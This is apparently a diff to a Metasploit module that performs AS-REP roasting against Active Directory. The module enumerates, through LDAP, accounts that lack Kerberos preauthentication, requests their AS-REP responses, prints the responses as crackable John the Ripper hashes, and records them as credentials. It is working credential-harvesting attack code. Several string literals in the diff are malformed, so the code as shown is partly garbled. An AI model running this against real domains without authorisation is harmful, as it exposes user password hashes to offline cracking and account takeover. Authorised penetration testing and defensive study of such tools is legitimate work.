@@ -58,11 +58,6 @@ def initialize(info = {})
5858 OptEnum . new ( 'LDAP::Auth' , [ true , 'The Authentication mechanism to use' , Msf ::Exploit ::Remote ::AuthOption ::NTLM , Msf ::Exploit ::Remote ::AuthOption ::LDAP_OPTIONS ] ) ,
5959 ]
6060 )
61-
62- default_config_file_path = File . join ( ::Msf ::Config . data_directory , 'auxiliary' , 'gather' , 'ldap_query' , 'ldap_queries_default.yaml' )
63- loaded_queries = safe_load_queries ( default_config_file_path ) || [ ]
64- asrep_roast_query = loaded_queries . select { |entry | entry [ 'action' ] == 'ENUM_USER_ASREP_ROASTABLE' }
65- self . ldap_query = asrep_roast_query [ 0 ]
6661 end
6762
6863 def run
@@ -72,6 +67,14 @@ def run
7267 when 'LDAP'
7368 run_ldap
7469 end
70+ rescue Errno ::ECONNRESET
71+ fail_with ( Failure ::Disconnected , 'The connection was reset.' )
72+ rescue Rex ::ConnectionError => e
73+ fail_with ( Failure ::Unreachable , e . message )
74+ rescue Rex ::Proto ::Kerberos ::Model ::Error ::KerberosError => e
75+ fail_with ( Failure ::NoAccess , e . message )
76+ rescue Net ::LDAP ::Error => e
77+ fail_with ( Failure ::Unknown , "#{ e . class } #{ e . message } )
7578 end
7679
7780 def run_brute
@@ -111,37 +114,12 @@ def run_brute
111114 end
112115
113116 def run_ldap
114- fail_with ( Msf ::Module ::Failure ::BadConfig , 'Must provide a username for connecting to LDAP' ) if datastore [ 'LDAPUsername' ] . blank?
115-
116- ldap_connect do |ldap |
117- validate_bind_success! ( ldap )
118- unless ( base_dn = ldap . base_dn )
119- fail_with ( Failure ::UnexpectedReply , "Couldn't discover base DN!" )
120- end
121-
122- schema_dn = ldap . schema_dn
123- filter_string = ldap_query [ 'filter' ]
124- attributes = ldap_query [ 'attributes' ]
117+ run_builtin_ldap_query ( 'ENUM_USER_ASREP_ROASTABLE' ) do |result |
118+ username = result . samaccountname [ 0 ]
125119 begin
126- filter = Net ::LDAP ::Filter . construct ( filter_string )
127- rescue StandardError => e
128- fail_with ( Failure ::BadConfig , "Could not compile the filter #{ filter_string } #{ e } )
129- end
130-
131- print_line
132- result_count = perform_ldap_query_streaming ( ldap , filter , attributes , base_dn , schema_dn ) do |result , _attribute_properties |
133- username = result . samaccountname [ 0 ]
134- begin
135- roast ( username )
136- rescue ::Rex ::Proto ::Kerberos ::Model ::Error ::KerberosError => e
137- print_error ( "#{ username } #{ e } )
138- end
139- end
140- if result_count == 0
141- print_error ( "No entries could be found for #{ filter_string } )
142- else
143- print_line
144- print_good ( "Query returned #{ result_count } #{ 'result' . pluralize ( result_count ) } )
120+ roast ( username )
121+ rescue ::Rex ::Proto ::Kerberos ::Model ::Error ::KerberosError => e
122+ print_error ( "#{ username } #{ e } )
145123 end
146124 end
147125 end
@@ -157,6 +135,34 @@ def roast(username)
157135 )
158136 hash = format_as_rep_to_john_hash ( res . as_rep )
159137 print_line ( hash )
138+ jtr_format = Metasploit ::Framework ::Hashes . identify_hash ( hash )
139+ report_hash ( hash , jtr_format )
140+ end
141+
142+ def report_hash ( hash , jtr_format )
143+ service_data = {
144+ address : rhost ,
145+ port : rport ,
146+ service_name : 'Kerberos' ,
147+ protocol : 'tcp' ,
148+ workspace_id : myworkspace_id
149+ }
150+ credential_data = {
151+ module_fullname : fullname ,
152+ origin_type : :service ,
153+ private_data : hash ,
154+ private_type : :nonreplayable_hash ,
155+ jtr_format : jtr_format
156+ } . merge ( service_data )
157+
158+ credential_core = create_credential ( credential_data )
159+
160+ login_data = {
161+ core : credential_core ,
162+ status : Metasploit ::Model ::Login ::Status ::UNTRIED
163+ } . merge ( service_data )
164+
165+ create_credential_login ( login_data )
160166 end
161167
162168 def etypes
0 commit comments